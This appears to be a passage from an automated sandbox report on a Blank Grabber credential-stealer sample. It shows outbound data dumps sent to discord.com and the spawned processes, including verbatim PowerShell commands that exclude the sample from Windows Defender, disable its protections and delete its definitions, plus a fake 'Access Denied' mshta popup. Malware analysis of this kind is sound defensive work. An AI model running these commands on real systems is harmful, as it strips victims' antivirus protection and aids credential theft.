                                                                                                                                                                                                                            2024-12-13 07:37:56 UTC16384OUTData Raw: 86 54 12 70 71 15 c5 85 ca 33 69 fb 49 dc 18 61 da 20 d5 93 37 fb c0 1a b1 9c 3e d3 0a 87 3f 66 8d fd 2a 78 bd 2d 95 55 14 39 81 78 99 66 e5 e8 3b 7e b2 ba fe 00 ae 83 3d f5 22 36 2b fc 53 35 bf e4 8f bb c8 a1 3b 00 e5 1e a4 5f a9 68 79 c7 94 ef 5b 3a 0b 1a 86 0d 39 20 6b 94 4d 38 67 07 90 27 20 54 d4 63 35 67 d8 0c db 5e a5 1c 19 ee 07 75 83 d2 c9 d5 24 89 bd 35 dc 0d b7 c5 bd d6 e7 59 40 a0 50 5d 23 41 08 4e cc 9b 33 b4 ee ba ec 77 9d 50 ba 0a ba 39 04 48 67 5b b3 3b 23 83 bf f9 92 a1 6d 08 02 90 40 84 94 8d 9c 7d c1 39 7d 36 38 6d a9 53 89 54 37 75 29 c6 22 6c 92 73 a5 47 99 02 f4 6a 15 bd 73 dd 37 7b 34 57 fd 9a f9 13 cf 87 94 39 6c 34 8b 37 47 16 65 60 86 4a 6f 6a cc 91 0b c6 d2 bb b1 bb 1f 2d b2 8f 89 46 f2 91 f2 a4 04 a3 37 9d 34 0a bf 31 15 b6 91
                                                                                                                                                                                                                            Data Ascii: Tpq3iIa 7>?f*x-U9xf;~="6+S5;_hy[:9 kM8g' Tc5g^u$5Y@P]#AN3wP9Hg[;#m@}9}68mST7u)"lsGjs7{4W9l47Ge`Joj-F741
                                                                                                                                                                                                                            2024-12-13 07:37:56 UTC16384OUTData Raw: 48 b6 83 8f 01 ec 70 f2 cc 72 89 cf 0e fd 10 96 d6 ae 9a 91 55 76 ed fc b1 25 08 a8 57 b4 5e 92 de 36 69 34 df 7b e4 bb b2 e0 0d 74 a7 66 2b 5d e9 86 34 0a 4e 93 32 3f 78 42 17 d6 88 88 51 e0 ec d1 91 3c 7b 4e ad 04 15 67 6c 07 60 0e 41 14 64 f2 99 93 1d 33 6a b0 73 e8 b3 db f8 dd 21 fb ce 0e 79 14 ff 5b 4e 0c 70 a2 39 e2 e4 8c ea d2 cc 16 07 39 4d e6 d2 cf d9 88 b9 e5 dc 6e cd 30 b9 89 b5 cb 00 22 e1 c8 c3 f3 dc ef 11 50 b2 1e 0f 06 70 bb 7b dc ed 0d fe 85 fb a1 fc 08 7a c2 0a 22 01 85 eb 19 62 bf 7b 70 50 9a 7f fb 07 10 6d 59 ad 5f a1 3f 28 34 76 4a 31 9d 5c 07 70 b1 55 6c c6 fd 67 40 27 2c 6e 22 44 c7 0b 28 8d ca 42 5c b4 4e 6e c6 0e b4 29 cf 27 65 5f e2 63 e7 d9 73 32 62 c8 db 27 dc 53 e7 ce 13 a7 3e db 52 d2 7d 10 14 c3 9e ce 2b e0 55 c1 44 ff ea 9b
                                                                                                                                                                                                                            Data Ascii: HprUv%W^6i4{tf+]4N2?xBQ<{Ngl`Ad3js!y[Np99Mn0"Pp{z"b{pPmY_?(4vJ1\pUlg@',n"D(B\Nn)'e_cs2b'S>R}+UD
                                                                                                                                                                                                                            2024-12-13 07:37:56 UTC16384OUTData Raw: 91 87 19 82 e4 ec 16 36 34 8f 87 22 7e b4 fa f4 26 04 62 a4 4a 85 6f a9 8f 49 5c d6 61 b7 ec 58 1a 7d 08 a9 c2 29 e8 39 fd c3 29 05 4c 3f ec 65 10 d1 ae 9f 6e 45 6b 05 11 ab 93 96 7d c4 7b d7 73 31 aa 96 e0 cf 88 1d 50 85 4c 82 2e 40 50 48 4c a3 55 98 fd 25 87 a2 9d 38 16 87 2a 72 22 67 b9 68 7c bd 81 1b b6 82 66 55 e5 39 0c a0 90 91 dd e1 d6 0e 5b 26 74 ff dd 70 c3 e3 f8 ab f2 e3 08 e1 54 7f 7a 20 3e f2 57 7e 90 b2 eb 75 f0 39 8f bc 6a 46 19 3c c5 44 bb fd d7 dd 11 79 50 cb f3 d9 22 89 86 e9 87 12 7b c0 f3 cb 6e 7e ea 83 01 a0 a5 f9 12 44 ae 50 06 44 83 d6 b2 f5 1a 2b 36 42 9e a0 81 98 84 3e 7f 9c fe 86 df 4a f8 3f 63 0c ec 4d e5 98 06 5b bf bd 0e f8 00 81 f9 6e 3a ba 82 69 33 03 5f a7 8b fb 98 2c 8e b8 2b 08 98 96 8c 6d 3a d8 1e 08 1b fc 19 b3 56 e5 99
                                                                                                                                                                                                                            Data Ascii: 64"~&bJoI\aX})9)L?enEk}{s1PL.@PHLU%8*r"gh|fU9[&tpTz >W~u9jF<DyP"{n~DPD+6B>J?cM[n:i3_,+m:V
                                                                                                                                                                                                                            2024-12-13 07:37:56 UTC16384OUTData Raw: 49 de 7e 8c 34 e7 d3 7e c9 dc a7 e4 ff 48 e6 3c dc b3 2b 77 f7 72 ed 38 23 3f 9a 2c 8e bf 8e 06 c0 df d4 ad d1 3c 0e 46 ec c7 2f cd c8 be 27 6e 29 da 5a b7 9d a0 2f 53 cb b3 45 67 bc be 4c 0c 29 cd d8 8e 49 6f 6c 63 e6 ab b2 c6 2e 11 43 bd 87 18 62 73 ef 71 2d 18 3f e3 38 70 04 ff a1 db 8e ec 32 36 d1 58 25 ba 3b a6 92 e3 d9 bb 29 77 1c 17 82 d1 6c 0b 31 5c 74 09 6a ba 2d 63 ba b5 da a0 8e a2 41 b3 d4 22 25 96 0f bf fe 92 b8 26 60 41 42 11 e5 b0 ef bb 3d 5b f1 a6 b5 9c da c6 02 3f b5 88 21 a6 b6 76 be 7c e6 8d bc b7 69 55 38 da 7d 5c 0b dd 92 02 5e c1 2b 2b b9 3f eb d6 7f 28 b1 f8 c2 26 3a 01 cc 00 60 2d 32 7e e3 c4 2a 17 26 e0 dd 6e 6a 86 c5 7b bb 25 f1 7d 7d d9 77 19 55 3a f2 98 05 6c 63 d8 17 6f 67 41 cc ab 19 af c7 e8 d9 cb b8 ca e8 82 e7 f2 1c 03 5a
                                                                                                                                                                                                                            Data Ascii: I~4~H<+wr8#?,<F/'n)Z/SEgL)Iolc.Cbsq-?8p26X%;)wl1\tj-cA"%&`AB=[?!v|iU8}\^++?(&:`-2~*&nj{%}}wU:lcogAZ
                                                                                                                                                                                                                            2024-12-13 07:37:57 UTC1255INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            Date: Fri, 13 Dec 2024 07:37:57 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                            x-ratelimit-reset: 1734075478
                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwkuEwvKx%2Fy1ZpufbQaAbIFwSVvPWB2fx%2FQ9pTsSali82LoCYBMuZqcL5aSWX3dZcf4tzU3koKglmm0u9v3dMQVCiodA3OWSmeLvvbehvpOqGgYfig7bgGugaUw%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Set-Cookie: __cfruid=59db110601c0cdd6f5cf870796f640135c7dbd50-1734075477; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                            Set-Cookie: _cfuvid=JEq3usgsc09laeU6BfULN4MDc08M6NykX3r6GGHoWys-1734075477571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8f144aafcf05c340-EWR


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:02:37:09
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\ahost.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7f91e0000
                                                                                                                                                                                                                            File size:7'967'812 bytes
                                                                                                                                                                                                                            MD5 hash:B5FC1D627D4DB7EE46DC0FE38AC28D01
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:02:37:10
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\ahost.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7f91e0000
                                                                                                                                                                                                                            File size:7'967'812 bytes
                                                                                                                                                                                                                            MD5 hash:B5FC1D627D4DB7EE46DC0FE38AC28D01
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:02:37:12
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
                                                                                                                                                                                                                            Imagebase:0x7ff7ebbd0000
                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff641f10000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:02:37:13
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:02:37:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:02:37:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:02:37:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                            Imagebase:0x7ff72f7f0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:02:37:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
